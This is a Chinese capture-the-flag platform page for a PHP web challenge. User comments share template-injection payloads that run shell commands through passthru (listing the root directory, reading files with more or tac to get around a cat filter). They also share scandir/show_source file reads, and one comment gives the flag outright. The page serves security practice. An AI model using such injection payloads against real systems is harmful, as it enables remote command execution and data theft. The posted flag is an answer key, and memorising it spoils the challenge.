聪明的phpWEB 未解决

分数: 25 金币: 2
题目作者: midi
一  血: ⎝Lazzaro⎠
一血奖励: 3金币
解  决: 3176
提  示:
描  述:
聪明的php
评论
XRain 1年前

没想起来 PHP 还有什么函数可以执行命令。不过,我用 scandir() 和 show_source() 就完成挑战了。 /?a={var_dump(scandir("/"))} 和 /?a={show_source("/_6583")}

回复 0

冯飞99 1年前

根据给出的提示发现可以通过/?回显得到源码,然后找到chatgpt解析一下源码,得知需要模板注入,构成payload,找到第二个源码再次让gpt翻译一下,得知在根目录下有个-数字的文件,由于cat命令用不了,使用tac命令查看得到flag。

回复 0

wxy1343 1年前

flag{d1342dda94d2f2b93118ff43530dcf77}

回复 0

YZ_86 1年前

bp抓包提交参数后会返回代码,根据代码可以发现有命令执行且过滤了哪几个函数{1*2}会发现返回2,这个时候用命令执行{passthru('ls /')},记得url转码,会发现返回结果有个图出的文件,cat被过滤了,用more查看就好{passthru('more /文件名')}。觉得清楚记得点赞,让更多人看到

回复 6

s1amese 1年前

/?w={{passthru("ls /")}} /?w={{passthru("more /_数字文件名")}}

回复 0

s1amese 1年前

passthru执行函数查看(ls),然后再查看列出的数字文件

回复 0

gleason 1年前

index.php?a={{passthru('more ../../../*|grep ff')}}

回复 0

Whittebz 1年前

{lf passthru("tac /_*")}{/if}

回复 0

Vio1et 1年前

哪位大神告诉我为什么{var_dump(`ls`)}不行

回复 0

zdfy005 2年前

https://blog.csdn.net/m_de_g/article/details/120380488

回复 3

WriteUp

image
midi

3 金币

评分(11)

解题动态

feifeifei1212 攻破了该题 2小时前
13184971752 攻破了该题 23小时前
YameMres 攻破了该题 1天前
lwh20060523 攻破了该题 2天前
besty2k 攻破了该题 2天前
zttyzz 攻破了该题 3天前
oohyodec 攻破了该题 3天前
zwhnsh 攻破了该题 4天前
15195388189 攻破了该题 6天前
平凡的人 攻破了该题 10天前
xiaoli98 攻破了该题 10天前
unilot 攻破了该题 13天前
5013230204 攻破了该题 13天前
creeee4esp 攻破了该题 13天前
montarius 攻破了该题 14天前
test002 攻破了该题 14天前
陈尘 攻破了该题 15天前
hikarical 攻破了该题 16天前
她说我们只是朋友 攻破了该题 17天前
lizhongtian 攻破了该题 17天前
问题反馈